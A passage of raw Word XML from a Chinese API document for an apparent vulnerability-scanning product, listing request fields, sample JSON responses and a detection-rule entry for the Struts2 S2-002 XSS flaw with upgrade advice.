            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2650789C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782FCB77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9D896B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测方式，1：版本比对 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12D7CA47" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B863D18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E2CBF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B77B28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53FC5864" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测结果描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B77B704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc115166188"/>
      <w:bookmarkStart w:id="228" w:name="查询漏洞应用运行信息"/>
      <w:bookmarkEnd w:id="226"/>
      <w:r>
        <w:t>查询漏洞应用运行信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="3AB5219E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D78C54"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_app_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="552F5BDD"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54"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="01C292E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4E415F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D2B4EB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5176AB59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5098675F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0681F1DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2089CD1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="618E58F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF778CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE273D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="325E8195" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42289C6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B05E614" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5856FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="040E444A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E9DFB88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 二选</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>即可，对应前台主机视图/风险视图二级页面的检查运行应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC77868" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28630C1E"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check_app_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"vulId":"QT042014001964","agentId":"d27260c9bb52d82c"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4A8AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B57BD27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "d27260c9bb52d82c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042014001964",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appRunning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000065F3"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390"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AD5B1D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A53DA85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF2DF7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19745E08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2048258F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F1211B6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43139B15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62314DA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187C84B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFB344B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16E9A5B1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233E65AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BCFBA13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B223A06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B18F130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4634DB23" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C863651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DE920C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C95C148" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4824C8B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="112050C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74C7B291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appRunning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1A5140" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08ABBF5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD95F0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否有运行应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FC716EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc115166189"/>
      <w:bookmarkStart w:id="230" w:name="查询所有可用检测项"/>
      <w:bookmarkEnd w:id="228"/>
      <w:r>
        <w:t>查询所有可用检测项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="33C6F330" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux漏洞作业检测项查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C4CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5A92A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rule_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1CF78BE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEAFA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31655CE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8FAF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rule_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25B04CF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77856FE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042008001658",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-002 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>漏洞",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "由于 Struts 2 在处理&lt;s：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;和&lt;s：a&gt;标签时，对于用于构造&lt;s：a&gt;标记输出的参数值，双引号会被转义，对于用于构造&lt;s：a&gt;和&lt;s：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;标记的输出的参数值，&lt;script&gt;标记会被递归地转义，导致存在 XSS 注入漏洞。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>请到官网下载</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>升级到Struts 2.0.12以上版本修复该漏洞，漏洞修复后需要服务重启，建议业务不繁忙时修复。\r\n下载更新：https://struts.apache.org/download",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permitExecuteTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeSeverity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
